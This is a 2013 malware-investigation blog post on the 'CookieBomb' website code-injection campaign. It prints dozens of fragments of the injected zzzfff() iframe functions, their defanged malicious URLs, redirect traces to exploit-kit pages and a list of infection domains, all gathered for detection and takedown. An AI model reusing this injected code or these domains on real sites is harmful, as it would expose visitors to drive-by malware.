What is behind #CookieBomb attack? (by @malm0u53)
23 Jul 2013I saw a wide spread infection of code injection reported in here, and decided to help the investigation:
As you may see in my tweets, I was struggling with the recent infection reported. And I came into conclusion of what to grep to follow and mitigate this attack further:RT @unixfreaxjp: @Secluded_Memory you know I would if i could, I cant now, grab it from my prev.tweets, --- Helping too
— MalMouse (@malm0u53) July 22, 2013
@Secluded_Memory @unixfreaxjp CookieBomb javascript. Which seems to be the function zzzfff()
— MalMouse (@malm0u53) July 22, 2013
Which ending up to the list of the functions and its IFRAME redirection below:@Secluded_Memory @unixfreaxjp one variant out of last three days - showkod(){ versus zzzfff() hxxp://airbrush-design.cz/images/nGMcmjkK.php
— MalMouse (@malm0u53) July 22, 2013
" function zzzfff() { mdi.src = 'hxxp://kirtec.de/asvz/Mgf4RNhq.php';
" function zzzfff() { ony.src = 'hxxp://www.ics-it.de/ftp_folders/JptDMrR2.php';
" function zzzfff() { e.src = 'hxxp://onewaypr.my-ehost.com/products/YFb48ymx.php';
" function zzzfff() { y.src = 'hxxp://yogyavilla.com/Map_Chinese_files/dtd.php';
" function zzzfff() { ywbc.src ='hxxp://htm.co.za/js/clicker.php';
" function zzzfff() { kaizc.src ='hxxp://press2.blogolize.com/cnt.php';
" function zzzfff() { yk.src = 'hxxp://gidropark.net/traf.php';
" function zzzfff() { rf.src = 'hxxp://appssold.com/wp-content/plugins/wp_add/D7AoggfC.php';
" function zzzfff() { e.src = 'hxxp://www.viagemanimais.com.br/2R83bpTL.php';
" function zzzfff() { gifdu.src = 'hxxp://olafknischewski.de/usage/esd.php';
" function zzzfff() { gzz.src = 'hxxp://intrologic.nl/Mn84DfXb.php';
" function zzzfff() { c.src = 'hxxp://goldsilver.server101.com/ORIGINALGSB/traf.php';"
" function zzzfff() { csp.src = 'hxxp://thyrr062.xsrv.jp/clicker.php';
" function zzzfff() { nex.src = 'hxxp://informationking.com/dnlds/kQBx948q.php';
" function zzzfff() { ax.src = 'hxxp://portofmiamicruiseparking.com/log/dtd.php';
" function zzzfff() { orih.src = 'hxxp://smartsecurit.cz/clik.php';
" function zzzfff() { i.src = 'hxxp://hauser-consulting.com/relay.php';
" function zzzfff() { pndb.src = 'hxxp://rocklandaerospace.com/edi/x46kpMKR.php';
" function zzzfff() { iwuu.src = 'hxxp://www.mai-ban.com/clik.php';
" function zzzfff() { p.src = 'hxxp://koliba.xercom.cz/yjW7x3V8.php';
" function zzzfff() { chyo.src = 'hxxp://dv-suedpfalz.de/melde/dtd.php';
" function zzzfff() { iin.src = 'hxxp://casino.kuti-komi.com/traf.php';
" function zzzfff() { di.src = 'hxxp://web134.sv01.net-housting.de/dtd.php';
" function zzzfff() { gir.src = 'hxxp://www.teutorace2012.de/components/mjBr9dbV.php';
" function zzzfff() { obgn.src = 'hxxp://www.talkingtojesus.com/Backups/QLMyqwF9.php';
" function zzzfff() { qvhb.src = 'hxxp://www.springcupcdv.it/relay.php';
" function zzzfff() { s.src = 'hxxp://www.springcupcdv.it/relay.php';
" function zzzfff() { ucr.src = 'hxxp://www.springcupcdv.it/relay.php';
" function zzzfff() { vpbo.src = 'hxxp://inntech.org.ru/counter.php'
" function showkod(){ js_kod.src = 'hxxp://airbrush-design.cz/images/nGMcmjkK.php';
[...]
Wow. Many links to follow.. So I made breakdown check for each PHP infectors as per released in pastebin: http://pastebin.com/raw.php?i=0cGUGk8X
The significant results I summarized below:
One of the link of:
" function zzzfff() {Which goes straight to the exploit page landing page I mentioned here
ony.src = 'hxxp://www.ics-it.de/ftp_folders/JptDMrR2.php';
redirect >> hxxp://kastenbafortschrittliche.jaimestexmex.com:801/untrue-doing-edge_ago.htm
The other link goes straight to the fake 502:
function zzzfff() {Verdict of the malicious URL above is here
rf.src = 'hxxp://appssold.com/wp-content/plugins/wp_add/D7AoggfC.php';
" >> 500 Internal Server Error
// header..
HTTP/1.1 500 Internal Server Error
Date: Mon, 22 Jul 2013 18:05:49 GMT
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5
mod_auth_passthrough/2.1 mod_bwlimited/1.4
FrontPage/5.0.2.2635
Content-Length: 704
Connection: close
Content-Type: text/html; charset=iso-8859-1
One of the link redirecting to the localhost, strange for a good link is it?
" function zzzfff() {
gifdu.src = 'hxxp://olafknischewski.de/usage/esd.php';
HTTP/1.1 302 Found
Date: Mon, 22 Jul 2013 18:14:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm3
Location: http://localhost/
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html
One link lead to permanent redirection of Exploit Kit landing page, that IP is a Plesk panel user:
" function zzzfff() {↑Verdict: [1] and [2]
gzz.src = 'hxxp://intrologic.nl/Mn84DfXb.php';
" HTTP/1.1 301 Moved Permanently
Date: Mon, 22 Jul 2013 18:16:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.intrologic.nl/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Location: hxxp://www.intrologic.nl/Mn84DfXb.php
X-Powered-By: PleskLin
One link of:
" function zzzfff() {Loads malware from:
c.src = 'hxxp://goldsilver.server101.com/ORIGINALGSB/traf.php';" >
Redirects users to: hxxp://www.schwarzeraben.de/rel.php
fgnfdfthrv.bee.pl↑This attack uses the .htaccess file to redirect users to a sites serving malware. Verdict: [1] http://labs.sucuri.net/db/malware/malware-entry-mwhta7 [3]
alolipololi.osa.pl
gberbhjerfds.osa.pl
zxsoftpromo.ru
centralfederation.ru
chimeboom.ru
faqaboutme.ru
lkjoiban.ru
longqwality.ru
zxsoftpromo.ru
The MMD tools for domains check shows result of:
fgnfdfthrv.bee.pl,127.0.0.1,which means (WARNING!) the alolipololi.osa.pl domain is currently active for infection,
alolipololi.osa.pl,74.125.236.80,
gberbhjerfds.osa.pl,127.0.0.1,
zxsoftpromo.ru,,
centralfederation.ru,,
chimeboom.ru,,
faqaboutme.ru,,
lkjoiban.ru,,
longqwality.ru,,
zxsoftpromo.ru,,
the fgnfdfthrv.bee.pl and gberbhjerfds.osa.pl is currently blacklisted and other .RU domains is inactive.
The below links went straight to the blacklisted sites:
" function zzzfff() {↑Verdict: [1] [2]
csp.src = 'hxxp://thyrr062.xsrv.jp/clicker.php';
HTTP/1.1 200 OK
Date: Mon, 22 Jul 2013 18:57:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Connection: close
Content-Type: text/html
And..
" function zzzfff() {Verdict: [1] [2]
nex.src = 'hxxp://informationking.com/dnlds/kQBx948q.php';
"
HTTP/1.1 200 OK
Date: Mon, 22 Jul 2013 19:03:40 GMT
Server: Apache/1.3.41 (Unix) FrontPage/5.0.2.2635 PHP/5.2.17 mod_ssl/2.8.31 OpenSSL/0.9.8j
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html
With many other similar results in the pastebin I reported here
This investigation is posted to help to verdict the malicious activities caused by #CiookieBomb code injection attack and the shutdown purpose for its detected malicious domains. The post is a work of the group effort, thank you to: @DarrelRendell and @Secluded_Memory for the help supporting this case with great advice.
#MalwareMustDie!